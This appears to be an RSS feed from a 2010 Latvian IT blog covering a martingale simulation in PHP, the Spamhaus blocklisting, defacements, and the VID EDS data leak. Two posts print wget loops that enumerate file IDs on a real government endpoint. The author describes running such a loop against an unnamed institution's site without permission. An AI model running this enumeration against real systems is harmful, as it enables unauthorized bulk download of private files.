<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; Interesanti</title>
	<atom:link href="http://dll.lv/category/interesanti/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Mon, 23 Aug 2010 06:40:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>50/50, aizraujošā informātika vai kāpēc nestrādā dubultošanas metode?</title>
		<link>http://dll.lv/5050-aizraujosa-informatika-vai-kapec-nestrada-dubultosanas-metode</link>
		<comments>http://dll.lv/5050-aizraujosa-informatika-vai-kapec-nestrada-dubultosanas-metode#comments</comments>
		<pubDate>Mon, 23 Aug 2010 06:27:01 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[Dzīve]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[50/50]]></category>
		<category><![CDATA[aizraujošā informātika]]></category>
		<category><![CDATA[dubultošana]]></category>
		<category><![CDATA[ITIS]]></category>
		<category><![CDATA[kazino]]></category>
		<category><![CDATA[padoms]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[rand]]></category>
		<category><![CDATA[rullete]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1241</guid>
		<description><![CDATA[Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?
Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu  
Nu ko domāts darīts, vajag izskaitļot cik tad ir [...]]]></description>
			<content:encoded><![CDATA[<p>Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?</p>
<p>Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <span id="more-1241"></span></p>
<p>Nu ko domāts darīts, vajag izskaitļot cik tad ir iespējams reizes praktiski neuzminēt? (lai saprastu cik vajadzētu $, lai kaut ko vinētu).</p>
<p>Teorija saka, ka katrā reizē iespējams uzminēt 50/50, tas nozīmē, ja neesi uzminējis 10 reizi, tad iespēja uzminēt pareizi 11tajā reizē arī ir tikai 50/50 <img src='http://dll.lv/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  Bet loģika saka ko citu- cik tad reizes var nepaveikties?</p>
<p>Tāpēc izveidoju simulācijas modeli, kurš noteiks cik reizes ir iespējams pēc kārtas kļūdīties?</p>
<p>Un kādi rezultāti? Interesanti&#8230;</p>
<p>Līdz šim biju lasījis vairākus rakstus, kur bija teikts, ka šī metode nestrādā&#8230; un kāpēc?</p>
<ul>
<li>tāpēc, ka, lai pēc vairākām neveiksmes reizēm mēs riskējam ar daudz reiz lielāku summu (pēc dubultošanas), nekā varam iegūt (piemēram, ja sākam ar 5ls, tad pēc 10 neveiksmes reizēm mums jau ir nepieciešams 2560 uz gājienu uzlikt, lai beigās vinnētu tikai 5ls <img src='http://dll.lv/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  )</li>
<li>jebkurā gājienā uzminēt iespēja ir tikai 50/50</li>
<li>daudzās grāmatās ir rakstīts, ka šī metode strādā, bet tikai līdz vienai reizei, tas nozīmē, ka sākumā var gūt panākumus, bet vienmēr pienāks reize, kad zaudēsiet..</li>
</ul>
<p>Protams te var runāt par riska apetīti un cik mēs esam gatavi riskēt, lai kaut ko iegūtu, bet ne par to ir stāsts.</p>
<p>Un tam seko rezultāti&#8230;</p>
<p>Lai tie maksimāli būtu ticami, eksperimentu atkārtoju z reizes un veicu i reizes..</p>
<p>Kādi rezultāti?</p>
<p>Lai neteiktu vairāk bēdīgi..</p>
<p>Izveidoto skriptu atkārtoju gan uz Linux, gan uz W7 un rezultāti ir gaužām atšķirīgi..</p>
<p>Uz linux pēc kārtas bija iespējams maksimāli neuzminēt 29 reizes..</p>
<p>Uz w7 pēc kārtas bija iespējams maksimāli neuzminēt 14 reizes..</p>
<p>Kāpēc varētu šie rādījumi atšķirties?</p>
<p>Nezinu, iespējams vaina ir rand funkcijā, kura uz win un lin izpildās dažādi.</p>
<p>Sākumā biju izmantojis rand funkciju starp 1 un 2 (rand(1,2)), tad win gadījumā rezultāts bija vēl cerīgāks (max 11 reizes pēc kārtas neuzminēt), bet kad izmainīju algoritmu, lai nosaka vērtību starp 100 un, ja ir zem 50, tad iegūt vērtību 1 un pretēji 2, tad ieguvu 14 reizes un visu laiku vienādu. Linux gadījumā katru reizi rezultāts tomēr mainījās, bet starpību starp rand (1,2) un rand(1,100) nejutu.</p>
<p>Kāpēc es visu šo iesāku? sākumā priekš sevis, lai saprastu, kāda tad ir faktiskā iespēja kļūdīties x reizes pēc kārtas un pēc tam uzskatīju par nepieciešamību parādīt citiem kas Jūs sagaida, ja nolemsiet dubultot..</p>
<p>Kādi tad ir mani secinājumi?</p>
<p>No eksperimenta sanāk, ja tev ir nauda un iespēja (kas rulletē nav, jo ir ierobežojums uz maksimālo likmi) dubultot vismaz vairāk kā 30 reizes sākotnējo likmi, tad karogs tev rokā (bet ņem vērā, ka var arī nepaveikties arī 30 reizē <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ).</p>
<p>Pretējā gadījumā Jums var paveikties arī vairākas reizes, bet kādreiz pienāks diena Z, kuru labāk nepiedzīvot.<br />
Lūk mans testa modelis:</p>
<blockquote><p><code><br />
<?php<br />
//izpildes laika aprēķinam<br />
$mtime = microtime();<br />
$mtime = explode(" ",$mtime);<br />
$mtime = $mtime[1] + $mtime[0];<br />
$starttime = $mtime;<br />
// beigas laika aprēķinam<br />
echo "Parbaudam varbūtības praktisko pusi";</p>
<p>//ar šo ciklu atkārtosim mērījumus z reizes, lai iegūtu pēc iespējas ticamāku rezultātu<br />
$max_max_katra_reize=0; //mainīgais, kurā glabāsies atkārtoto mērījumu gadījumā maksimālais neuzminētais skaits pēc kārtas<br />
for ($z=1;$z&lt;=1000;$z++)<br />
{<br />
$max_katra_reize=0; //mainīgais, kas saturēs maksimālo nesakritības reizi katrā piegājienā (i ciklā, nevis z ciklā)<br />
$skaits=0; //cik reizes pec kārtas nesakritīs konkrētā mērījumā (i cikls)<br />
$max_skaits=0; //maksimālais skaitlis cik reizes pēc kārtas ir nesakritis konkrētā mērījumā (i cikls)</p>
<p>for ($i=1;$i&lt;=100000;$i++){ //cikls, kurš simulēs konkrēto mērījumu<br />
$gad1=rand(1,100);<br />
$gad2=rand(1,100);<br />
if ($gad1&lt;=50){$pimais=1;} else {$pirmais=2;}<br />
if ($gad2&lt;=50){$otrais=1;} else {$otrais=2;}<br />
/*<br />
$pirmais=rand(1,2); //iegūstam pirmo nejaušo vērtību<br />
$otrais=rand(1,2); //iegūstam otro nejaušo vērtību<br />
*/<br />
//echo "$pirmais $otrais<br />
";<br />
if ($pirmais!=$otrais){ //ja abas vērtības nesakrīt, tad palielinam pēc kārtas nesakritušo vērtību<br />
$skaits=$skaits+1;<br />
}<br />
if ($pirmais==$otrais){ //ja abas vērtības sakrīt, tad pēc kārtas nesakritušo vērtību nonullējam<br />
$skaits=0;<br />
}<br />
if ($skaits&gt;$max_skaits){ //iegūstam maksimālo nesakritušo vētību katrā mērījumā, lai nav jāizvada viss liekais<br />
$max_skaits=$skaits;<br />
$max_katra_reize=$max_skaits;<br />
//echo "<br />
Maksimālais nesakritušo reižu skaits3: $max_katra_reize<br />
";<br />
}<br />
} //beidzas konkrētā mērījuma cikls (i cikls)<br />
//pēc cikla beigām esam ieguvuši maksimālo skaitli $maz_katra_reize, kurā glabājas vērtība cik maksimāli pēc kārtas reizes nesakrita abi skaitļi</p>
<p>if ($max_katra_reize&gt;$max_max_katra_reize){ // tagad izvadīsim cik tad bija maksimālais nesakrītības reizes pēc mērījuma un to atkārtojot z reizes pieņemamās pārliecības iegūšanai<br />
$max_max_katra_reize=$max_katra_reize;<br />
echo "Maksimālais nesakritušo reižu skaits: $max_max_katra_reize<br />
";<br />
}<br />
} //beidzas atkārtoto mērījumu cikls (z cikls)</p>
<p>//laika aprēķinam<br />
$mtime = microtime();<br />
$mtime = explode(" ",$mtime);<br />
$mtime = $mtime[1] + $mtime[0];<br />
$endtime = $mtime;<br />
$totaltime = ($endtime - $starttime);<br />
echo "Lapa tika aprēķināta ".$totaltime." sekundēs";</p>
<p>?&gt;</code></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/5050-aizraujosa-informatika-vai-kapec-nestrada-dubultosanas-metode/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>NIC.lv pret Spamhaus vai arī labs ne vienmēr nozīmē labs</title>
		<link>http://dll.lv/nic-lv-pret-spamhaus-vai-ari-labs-ne-vienmer-nozime-labs</link>
		<comments>http://dll.lv/nic-lv-pret-spamhaus-vai-ari-labs-ne-vienmer-nozime-labs#comments</comments>
		<pubDate>Sat, 21 Aug 2010 07:38:59 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[CERT]]></category>
		<category><![CDATA[ITIS]]></category>
		<category><![CDATA[nic]]></category>
		<category><![CDATA[Spamhaus]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1224</guid>
		<description><![CDATA[Atgadījumu ar Spamhaus jau ir komentēts un apspriests daudz kur, piemēram, Apollo.lv vai Pods.lv un ir pieejams raksts arī theregister.co.uk.
Īsam ievadam- bija izveidojusies situācija, ka liela daļa LV IP nonāca epasta black listā un tāpēc daudziem korekti nestrādāja epasts.
Beigās pievienoju no ISACA paneļdiskusijas ierakstu- kas tad īsti bija noticis un kāpēc tas nav tik vienkārši, [...]]]></description>
			<content:encoded><![CDATA[<p>Atgadījumu ar Spamhaus jau ir komentēts un apspriests daudz kur, piemēram, <a href="http://www.apollo.lv/portal/news/articles/211671" target="_blank">Apollo.lv</a> vai <a href="http://pods.lv/2010/08/17/spamhaus_nemil_latvijas_spamerus/" target="_blank">Pods.lv</a> un ir pieejams raksts arī <a href="http://www.theregister.co.uk/2010/08/13/spamhaus_latvia/" target="_blank">theregister.co.uk</a>.</p>
<div id="_mcePaste">Īsam ievadam- bija izveidojusies situācija, ka liela daļa LV IP nonāca epasta black listā un tāpēc daudziem korekti nestrādāja epasts.</div>
<div id="_mcePaste">Beigās pievienoju no ISACA paneļdiskusijas ierakstu- kas tad īsti bija noticis un kāpēc tas nav tik vienkārši, nevainīgi vai labi (nemākam angļu valodu- Spamhaus atrakstīšanās „are the result of language barriers” vai paši vainīgi), kā izklausās no sākuma.</div>
<div id="_mcePaste">Ieraksts diezgan sliktā kvalitātē un bez iespējas paskatīties prezentāciju, bet iespējams uzzināsiet ko jaunu.</div>
<div><a href="http://dll.lv/wp-content/uploads/2010/08/vlc.mp3">vlc2</a></div>
<div><a href="http://dll.lv/wp-content/uploads/2010/08/vlc2.mp3">vlc2</a></div>
<div>Un tāpēc gribēju uzsvērt pāris lietas, kuras, manuprāt, neparādījās ne vienā no šiem (pods, apollo, datuve) resursiem:</div>
<div id="_mcePaste">•	paralēli tam arī tika bloķēts Latnet epasta serveris, kuram nebija nekāda sakara ar negadījumā iesaistītām IP adresēm (Tāpēc ir ļoti pamatotas NIC dusmas, jo tā bija liela Spamhaus kļūda).</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/nic-lv-pret-spamhaus-vai-ari-labs-ne-vienmer-nozime-labs/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://dll.lv/wp-content/uploads/2010/08/vlc.mp3" length="5522913" type="audio/mpeg" />
<enclosure url="http://dll.lv/wp-content/uploads/2010/08/vlc2.mp3" length="16421057" type="audio/mpeg" />
		</item>
		<item>
		<title>Windows update error Nr 80072F8F</title>
		<link>http://dll.lv/windows-update-error-nr-80072f8f</link>
		<comments>http://dll.lv/windows-update-error-nr-80072f8f#comments</comments>
		<pubDate>Mon, 16 Aug 2010 06:39:41 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[local time]]></category>
		<category><![CDATA[time]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[Win]]></category>
		<category><![CDATA[windows 7]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1218</guid>
		<description><![CDATA[Pēc drauga datora pārinstalācijas dators nevarēja saņemt tam nepieciešamos atjauninājumus un izdeva kļūdas paziņojumu nr  80072F8F.
Ilgu laiku nevarēju saprast ko tas nozīmē- lamāju XP draiverus, jo W7 atbalsta tiem vairs nebija (laptops morāli novecojis) iekams nodomāju pagooglēt. Pēc 1min jau kļuva skaidrs- problēma datora datuma iestatījumos. Nezin kāda iemesla pēc- laiku rādīja korekti, bet [...]]]></description>
			<content:encoded><![CDATA[<p>Pēc drauga datora pārinstalācijas dators nevarēja saņemt tam nepieciešamos atjauninājumus un izdeva kļūdas paziņojumu nr  80072F8F.<br />
Ilgu laiku nevarēju saprast ko tas nozīmē- lamāju XP draiverus, jo W7 atbalsta tiem vairs nebija (laptops morāli novecojis) iekams nodomāju pagooglēt. Pēc 1min jau kļuva skaidrs- problēma datora datuma iestatījumos. Nezin kāda iemesla pēc- laiku rādīja korekti, bet mēnesis bija ar nobīdi. Izlaboju un viss aizgāja.</p>
<p>Man tas liekās interesanti, jo XP laikos ar tādu kļūdu nebiju saskāries un neredzu tam arī nekādu nepieciešamību- PC aizsūta savu pašreizējo stāvokli un update serveris atgriež nepieciešamos updates, kam tur vēl pa vidu ir nepieciešams lokālais datora laiks?</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/windows-update-error-nr-80072f8f/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bezmaksas hostings</title>
		<link>http://dll.lv/bezmaksas-hostings</link>
		<comments>http://dll.lv/bezmaksas-hostings#comments</comments>
		<pubDate>Thu, 12 Aug 2010 20:16:53 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[bezmaksas hostings]]></category>
		<category><![CDATA[hostings]]></category>
		<category><![CDATA[lēts hostings]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1213</guid>
		<description><![CDATA[Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.
Cerams kādam noderēs.
]]></description>
			<content:encoded><![CDATA[<p>Nejauši uzskrēju vienam bezmaksas hostingam <a href="http://www.zymic.com/" target="_blank">zumic.com</a>. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.</p>
<p>Cerams kādam noderēs.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/bezmaksas-hostings/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Mēģinām pielietot EDS konstatēto ievainojamību citur</title>
		<link>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur</link>
		<comments>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur#comments</comments>
		<pubDate>Tue, 10 Aug 2010 17:48:11 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[Win]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1201</guid>
		<description><![CDATA[Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.
Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.
Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.
Linux gadījumā tas varētu izskatīties šādā veidā:
for i in [...]]]></description>
			<content:encoded><![CDATA[<p>Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.</p>
<p>Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju <a href="http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas" target="_blank">šeit</a>.</p>
<p>Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.</p>
<p>Linux gadījumā tas varētu izskatīties šādā veidā:</p>
<blockquote><p>for i in {1..7500000}; do<br />
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;<br />
done</p></blockquote>
<p><span id="more-1201"></span></p>
<p>Bet tā kā mājās stāv W7, un no LiveCD ielādēties ir slinkums izvēlējos garāko ceļu.</p>
<p>wget komandai ir arī windows alternatīva, kuru var atrast <a href="http://www.gnu.org/software/wget/" target="_blank">GNU lapā</a>.</p>
<p>Pēc instalēšanas un notūnēšanas, lai to varētu palaist no jebkuras vietas var ķerties pie nākamā soļa- atrast mājaslapu, kurā ir līdzīga ievainojamība.</p>
<p>Otrs un pareizākais variants būtu radīt šādu ievainojamību kādā savā lapā un tad testēt, bet šoreiz atzīšos, esmu par slinku.</p>
<p>Pēc dažām minūtēm tika atrasta diezgan lielas iestādes lapa, kurā ir līdzīgs gadījums. Pēc http://&#8230;&#8230;lv/file.php?id=, id lauka vērtībā mainot vērtības tiek piedāvāts nolādēt dažādus failus.</p>
<p>Lielākā daļa no testā atklātiem dokumentiem (daži bija php faili, kurus diez vai admins vēlējās, lai varētu nolādēt) ir arī brīvi pieejami no mājaslapas, tā kā uzskatu, ka tā ir funkcionalitāte, nevis trūkums <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Mājaslapas adrese ir izmainīt, lai kārtējais tīnis neapciemo šo lapu un &#8230;..</p>
<p>Nu tad pie testa un rezultātiem.</p>
<p>Lai wget un for cikls strādātu uz win, tas ir jāmodificē- man sanāca šāds brīnums:</p>
<blockquote><p>for /l %%i in (1,1,1000) do (wget -r &#8220;http://&#8230;&#8230;..file.php?id=%%i&#8221;)</p></blockquote>
<p>Izskatās easy, bet..</p>
<p>visi iegūtie faili ir nevis nosaukums.paplašinājums, bet:</p>
<p>.file.php?id=1</p>
<p>.file.php?id=2</p>
<p>.file.php?id=3, utt</p>
<p>Ja zinātu, ka visi nolādētie faili ir viena tipa, piemēram, *.doc, tad varētu vienkārši visus pārsaukt par *.doc un lietot laimīgs.</p>
<p>Bet problēma ir tajā, ka starp šiem failiem ir gan pdf, php, doc un sazin vēl kas.</p>
<p>Meklēju risinājumu šai problēmai iekš googles, bet neko prātīgu neatradu. Daudzi ir uzdevuši šādu jautājumu, bet nevienam nebija atbilde.</p>
<p>Vienīgais, ko atradu ir izmantojot -o mainīgo noteikt uzreiz faila nosaukumu, bet šāds piegājiens der tikai, ja tiek nolādēts viens fails un jau ar zināmu paplašinājumu. For ciklā tas nestrādā.</p>
<p>Kāds ir secinājums?</p>
<p>Nolādēt failus ir gaužām vienkārši arī praksē, tikai pēc tam var nākties izlabot failu paplašinājumu.</p>
<p>Manuprāt, problēma slēpjas tajā, ka šādā veidā notiek redirekts uz no file?id uz konkrētu failu, kuru wget programa nespēj korekti paņemt pretī.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Pods izsmiets vai vēsture atkārtojas</title>
		<link>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas</link>
		<comments>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas#comments</comments>
		<pubDate>Fri, 06 Aug 2010 19:55:59 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1195</guid>
		<description><![CDATA[Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.
Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..
Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.
Man pašam arī pāris mēnešus [...]]]></description>
			<content:encoded><![CDATA[<p>Tiko uzrakstīju post par <a href="http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets" target="_blank">boot</a> izsmiešanu un gribas palasīt ko citu.</p>
<p>Un te seko nākamais pārsteigums- pods izsmiets.<br />
<a href="http://dll.lv/wp-content/uploads/2010/08/pods.png"><img class="aligncenter size-medium wp-image-1196" title="pods" src="http://dll.lv/wp-content/uploads/2010/08/pods-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Nu ko vēsture atkārtojas..</p>
<p>Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.</p>
<p>Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.</p>
<p>Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.</p>
<p>Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV</p>
<p>No sava Hackera neaizbēgsi <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/pods-izsmiets-vai-vesture-atkartojas/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Boot bīstama lapa vai arī boot ticis izsmiets</title>
		<link>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets</link>
		<comments>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets#comments</comments>
		<pubDate>Fri, 06 Aug 2010 19:39:10 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[hostēšanās]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[web izstrāde]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1192</guid>
		<description><![CDATA[Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.

Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.
Būtu interesanti, ja Boot būtu nopublicējis kā viss [...]]]></description>
			<content:encoded><![CDATA[<p>Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.<br />
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.<br />
<a href="http://dll.lv/wp-content/uploads/2010/08/boot.png"><img class="aligncenter size-medium wp-image-1193" title="boot" src="http://dll.lv/wp-content/uploads/2010/08/boot-300x168.png" alt="" width="300" height="168" /></a></p>
<p>Palika interesanti..<br />
Lasu tālāk iekš <a href="http://www.boot.lv/tehnika/bazam-par-datora-drosibu-apmeklejot-boot-lv-vai-sekoman-lv-vairs-nav-pamata/" target="_blank">boot</a>, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.</p>
<p>Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.</p>
<p>Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/boot-bistama-lapa-vai-ari-boot-ticis-izsmiets/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kā tika nolādēti dati no VID EDS sistēmas?</title>
		<link>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas</link>
		<comments>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas#comments</comments>
		<pubDate>Wed, 04 Aug 2010 07:30:21 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1187</guid>
		<description><![CDATA[Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot [...]]]></description>
			<content:encoded><![CDATA[<p>Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.<br />
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:<br />
Linux veidīgā konsolē uzrakstām un priecājamies</p>
<blockquote><p><code>for i in {1..7500000}; do<br />
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;<br />
done</code></p></blockquote>
<p>Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu</title>
		<link>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu</link>
		<comments>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu#comments</comments>
		<pubDate>Tue, 03 Aug 2010 21:14:45 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
